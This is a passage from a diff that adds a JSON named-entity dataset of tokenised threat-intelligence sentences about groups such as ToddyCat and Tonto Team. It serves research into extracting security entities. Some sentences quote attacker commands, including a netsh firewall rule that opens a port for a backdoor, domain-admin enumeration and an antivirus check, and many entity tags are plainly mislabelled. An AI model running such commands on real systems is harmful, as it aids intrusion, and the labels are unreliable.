"CVE-2014-6324", + "and", + "CVE-2017-0213", + "to", + "escalate", + "privileges." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "exploited", + "MS17-010", + "to", + "move", + "laterally", + "to", + "other", + "systems", + "on", + "the", + "network." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "actors", + "look", + "for", + "and", + "use", + "VPN", + "profiles", + "during", + "an", + "operation", + "to", + "access", + "the", + "network", + "using", + "external", + "VPN", + "services.", + "Threat", + "Group-3390", + "has", + "also", + "obtained", + "OWA", + "account", + "credentials", + "during", + "intrusions", + "that", + "it", + "subsequently", + "used", + "to", + "attempt", + "to", + "regain", + "access", + "when", + "evicted", + "from", + "a", + "victim", + "network." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "deleted", + "existing", + "logs", + "and", + "exfiltrated", + "file", + "archives", + "from", + "a", + "victim." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "downloaded", + "additional", + "malware", + "and", + "tools,", + "including", + "through", + "the", + "use", + "of", + "`certutil`,", + "onto", + "a", + "compromised", + "host", + "." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "actors", + "installed", + "a", + "credential", + "logger", + "on", + "Microsoft", + "Exchange", + "servers.", + "Threat", + "Group-3390", + "also", + "leveraged", + "the", + "reconnaissance", + "framework,", + "ScanBox,", + "to", + "capture", + "keystrokes." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "actors", + "have", + "used", + "gsecdump", + "to", + "dump", + "credentials.", + "They", + "have", + "also", + "dumped", + "credentials", + "from", + "domain", + "controllers." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "actors", + "have", + "used", + "a", + "modified", + "version", + "of", + "Mimikatz", + "called", + "Wrapikatz", + "to", + "dump", + "credentials.", + "They", + "have", + "also", + "dumped", + "credentials", + "from", + "domain", + "controllers." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "used", + "<code>net", + "user</code>", + "to", + "conduct", + "internal", + "discovery", + "of", + "systems." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "locally", + "staged", + "encrypted", + "archives", + "for", + "later", + "exfiltration", + "efforts." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "lured", + "victims", + "into", + "opening", + "malicious", + "files", + "containing", + "malware." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Threat", + "Group-3390", + "tool", + "has", + "created", + "new", + "Registry", + "keys", + "under", + "`HKEY_CURRENT_USER\\Software\\Classes\\`", + "and", + "`HKLM\\SYSTEM\\CurrentControlSet\\services`." + ], + "ner_tags": [ + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "actors", + "use", + "the", + "Hunter", + "tool", + "to", + "conduct", + "network", + "service", + "discovery", + "for", + "vulnerable", + "systems." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "detached", + "network", + "shares", + "after", + "exfiltrating", + "files,", + "likely", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "obtained", + "a", + "KeePass", + "database", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "used", + "PowerShell", + "for", + "execution." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Threat", + "Group-3390", + "tool", + "can", + "spawn", + "`svchost.exe`", + "and", + "inject", + "the", + "payload", + "into", + "that", + "process." + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Threat", + "Group-3390", + "tool", + "can", + "read", + "and", + "decrypt", + "stored", + "Registry", + "values." + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390's", + "malware", + "can", + "add", + "a", + "Registry", + "key", + "to", + "`Software\\Microsoft\\Windows\\CurrentVersion\\Run`", + "for", + "persistence." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "moved", + "staged", + "encrypted", + "archives", + "to", + "Internet-facing", + "servers", + "that", + "had", + "previously", + "been", + "compromised", + "with", + "China", + "Chopper", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "used", + "the", + "<code>net", + "view</code>", + "command." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "actors", + "have", + "used", + "gsecdump", + "to", + "dump", + "credentials.", + "They", + "have", + "also", + "dumped", + "credentials", + "from", + "domain", + "controllers." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "packed", + "malware", + "and", + "tools,", + "including", + "using", + "VMProtect." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "used", + "e-mail", + "to", + "deliver", + "malicious", + "attachments", + "to", + "victims." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "actors", + "use", + "NBTscan", + "to", + "discover", + "vulnerable", + "systems." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "used", + "`net", + "use`", + "and", + "`netstat`", + "to", + "conduct", + "internal", + "discovery", + "of", + "systems.", + "The", + "group", + "has", + "also", + "used", + "`quser.exe`", + "to", + "identify", + "existing", + "RDP", + "sessions", + "on", + "a", + "victim." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "used", + "`whoami`", + "to", + "collect", + "system", + "user", + "information." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "obtained", + "and", + "used", + "tools", + "such", + "as", + "Impacket,", + "pwdump,", + "Mimikatz,", + "gsecdump,", + "NBTscan,", + "and", + "Windows", + "Credential", + "Editor." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "compromised", + "third", + "party", + "service", + "providers", + "to", + "gain", + "access", + "to", + "victim's", + "environments." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "I-Org", + "I-Org", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "hosted", + "malicious", + "payloads", + "on", + "Dropbox." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "staged", + "tools,", + "including", + "gsecdump", + "and", + "WCE,", + "on", + "previously", + "compromised", + "websites." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "actors", + "obtain", + "legitimate", + "credentials", + "using", + "a", + "variety", + "of", + "methods", + "and", + "use", + "them", + "to", + "further", + "lateral", + "movement", + "on", + "victim", + "networks." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "malware", + "has", + "used", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "used", + "a", + "variety", + "of", + "Web", + "shells." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "used", + "command-line", + "interfaces", + "for", + "execution." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Threat", + "Group-3390", + "tool", + "can", + "use", + "WMI", + "to", + "execute", + "a", + "binary." + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "used", + "WinRM", + "to", + "enable", + "remote", + "execution." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390's", + "malware", + "can", + "create", + "a", + "new", + "service,", + "sometimes", + "naming", + "it", + "after", + "the", + "config", + "information,", + "to", + "gain", + "persistence." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Thrip", + "has", + "used", + "WinSCP", + "to", + "exfiltrate", + "data", + "from", + "a", + "targeted", + "organization", + "over", + "FTP." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Thrip", + "leveraged", + "PowerShell", + "to", + "run", + "commands", + "to", + "download", + "payloads,", + "traverse", + "the", + "compromised", + "networks,", + "and", + "carry", + "out", + "reconnaissance." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Thrip", + "used", + "a", + "cloud-based", + "remote", + "access", + "software", + "called", + "LogMeIn", + "for", + "their", + "attacks." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "Thrip", + "has", + "obtained", + "and", + "used", + "tools", + "such", + "as", + "Mimikatz", + "and", + "PsExec." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "ToddyCat", + "has", + "leveraged", + "xcopy,", + "7zip,", + "and", + "RAR", + "to", + "stage", + "and", + "compress", + "collected", + "documents", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ToddyCat", + "has", + "run", + "scripts", + "to", + "collect", + "documents", + "from", + "targeted", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Prior", + "to", + "executing", + "a", + "backdoor", + "ToddyCat", + "has", + "run", + "`cmd", + "/c", + "start", + "/b", + "netsh", + "advfirewall", + "firewall", + "add", + "rule", + "name=\"SGAccessInboundRule\"", + "dir=in", + "protocol=udp", + "action=allow", + "localport=49683`", + "to", + "allow", + "the", + "targeted", + "system", + "to", + "receive", + "UDP", + "packets", + "on", + "port", + "49683." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ToddyCat", + "has", + "run", + "`net", + "user", + "%USER%", + "/dom`", + "for", + "account", + "discovery." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ToddyCat", + "has", + "used", + "compromised", + "domain", + "admin", + "credentials", + "to", + "mount", + "local", + "network", + "shares." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ToddyCat", + "has", + "executed", + "`net", + "group", + "\"domain", + "admins\"", + "/dom`", + "for", + "discovery", + "on", + "compromised", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ToddyCat", + "has", + "used", + "a", + "DropBox", + "uploader", + "to", + "exfiltrate", + "stolen", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "ToddyCat", + "has", + "exploited", + "the", + "ProxyLogon", + "vulnerability", + "(CVE-2021-26855)", + "to", + "compromise", + "Exchange", + "Servers", + "at", + "multiple", + "organizations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Features", + "B-Exp", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ToddyCat", + "has", + "run", + "scripts", + "to", + "enumerate", + "recently", + "modified", + "documents", + "having", + "either", + "a", + ".pdf,", + ".doc,", + ".docx,", + ".xls", + "or", + ".xlsx", + "extension." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "ToddyCat", + "has", + "hidden", + "malicious", + "scripts", + "using", + "`powershell.exe", + "-windowstyle", + "hidden`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "ToddyCat", + "has", + "used", + "the", + "name", + "`debug.exe`", + "for", + "malware", + "components." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ToddyCat", + "has", + "used", + "`WinExec`", + "to", + "execute", + "commands", + "received", + "from", + "C2", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ToddyCat", + "has", + "used", + "a", + "passive", + "backdoor", + "that", + "receives", + "commands", + "with", + "UDP", + "packets." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "ToddyCat", + "has", + "used", + "Powershell", + "scripts", + "to", + "perform", + "post", + "exploit", + "collection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ToddyCat", + "has", + "run", + "`cmd", + "/c", + "start", + "/b", + "tasklist`", + "to", + "enumerate", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ToddyCat", + "manually", + "transferred", + "collected", + "files", + "to", + "an", + "exfiltration", + "host", + "using", + "xcopy." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "ToddyCat", + "has", + "used", + "`ping", + "%REMOTE_HOST%`", + "for", + "post", + "exploit", + "discovery." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ToddyCat", + "has", + "used", + "locally", + "mounted", + "network", + "shares", + "for", + "lateral", + "movement", + "through", + "targated", + "environments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ToddyCat", + "has", + "used", + "scheduled", + "tasks", + "to", + "execute", + "discovery", + "commands", + "and", + "scripts", + "for", + "collection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ToddyCat", + "can", + "determine", + "is", + "Kaspersky", + "software", + "is", + "running", + "on", + "an", + "endpoint", + "by", + "running", + "`cmd", + "/c", + "wmic", + "process", + "where", + "name=\"avp.exe\"`." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "ToddyCat", + "has", + "sent", + "loaders", + "configured", + "to", + "run", + "Ninja", + "as", + "zip", + "archives", + "via", + "Telegram." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ToddyCat", + "has", + "collected", + "information", + "on", + "bootable", + "drives", + "including", + "model,", + "vendor,", + "and", + "serial", + "numbers." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ToddyCat", + "has", + "used", + "`netstat", + "-anop", + "tcp`", + "to", + "discover", + "TCP", + "connections", + "to", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ToddyCat", + "has", + "used", + ".bat", + "scripts", + "and", + "`cmd`", + "for", + "execution", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ToddyCat", + "has", + "used", + "WMI", + "to", + "execute", + "scripts", + "for", + "post", + "exploit", + "document", + "collection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tonto", + "Team", + "abuses", + "a", + "legitimate", + "and", + "signed", + "Microsoft", + "executable", + "to", + "launch", + "a", + "malicious", + "DLL." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tonto", + "Team", + "has", + "exploited", + "Microsoft", + "vulnerabilities,", + "including", + "CVE-2018-0798,", + "CVE-2018-8174,", + "CVE-2018-0802,", + "CVE-2017-11882,", + "CVE-2019-9489", + "CVE-2020-8468,", + "and", + "CVE-2018-0798", + "to", + "enable", + "execution", + "of", + "their", + "delivered", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "B-Features", + "B-Features", + "B-Features", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tonto", + "Team", + "has", + "exploited", + "CVE-2019-0803", + "and", + "MS16-032", + "to", + "escalate", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Features", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tonto", + "Team", + "has", + "used", + "EternalBlue", + "exploits", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Features", + "B-Exp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tonto", + "Team", + "has", + "routed", + "their", + "traffic", + "through", + "an", + "external", + "server", + "in", + "order", + "to", + "obfuscate", + "their", + "location." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-OffAct", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "Tonto", + "Team", + "has", + "downloaded", + "malicious", + "DLLs", + "which", + "served", + "as", + "a", + "ShadowPad", + "loader." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tonto", + "Team", + "has", + "used", + "keylogging", + "tools", + "in", + "their", + "operations." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tonto", + "Team", + "has", + "used", + "the", + "<code>ShowLocalGroupDetails</code>", + "command", + "to", + "identify", + "administrator,", + "user,", + "and", + "guest", + "accounts", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tonto", + "Team", + "has", + "relied", + "on", + "user", + "interaction", + "to", + "open", + "their", + "malicious", + "RTF", + "documents." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tonto", + "Team", + "has", + "used", + "tools", + "such", + "as", + "NBTscan", + "to", + "enumerate", + "network", + "shares." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tonto", + "Team", + "has", + "used", + "a", + "variety", + "of", + "credential", + "dumping", + "tools." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "Tonto", + "Team", + "has", + "used", + "PowerShell", + "to", + "download", + "additional", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tonto", + "Team", + "has", + "used", + "Python-based", + "tools", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tonto", + "Team", + "has", + "delivered", + "payloads", + "via", + "spearphishing", + "attachments." + ], + "ner_tags": [ + "B-SamFile", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Tonto", + "Team", + "has", + "used", + "a", + "first", + "stage", + "web", + "shell", + "after", + "compromising", + "a", + "vulnerable", + "Exchange", + "server." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Transparent", + "Tribe", + "has", + "registered", + "domains", + "to", + "mimic", + "file", + "sharing,", + "government,", + "defense,", + "and", + "research", + "websites", + "for", + "use", + "in", + "targeted", + "campaigns." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Idus", + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "Transparent", + "Tribe", + "has", + "compromised", + "domains", + "for", + "use", + "in", + "targeted", + "malicious", + "campaigns." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "Transparent", + "Tribe", + "has", + "used", + "websites", + "with", + "malicious", + "hyperlinks", + "and", + "iframes", + "to", + "infect", + "targeted", + "victims", + "with", + "Crimson,", + "njRAT,", + "and", + "other", + "malicious", + "tools." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Transparent", + "Tribe", + "has", + "set", + "up", + "websites", + "with", + "malicious", + "hyperlinks", + "and", + "iframes", + "to", + "infect", + "targeted", + "victims", + "with", + "Crimson,", + "njRAT,", + "and", + "other", + "malicious", + "tools." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Transparent", + "Tribe", + "has", + "used", + "dynamic", + "DNS", + "services", + "to", + "set", + "up", + "C2." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Transparent", + "Tribe", + "has", + "dropped", + "encoded", + "executables", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Transparent", + 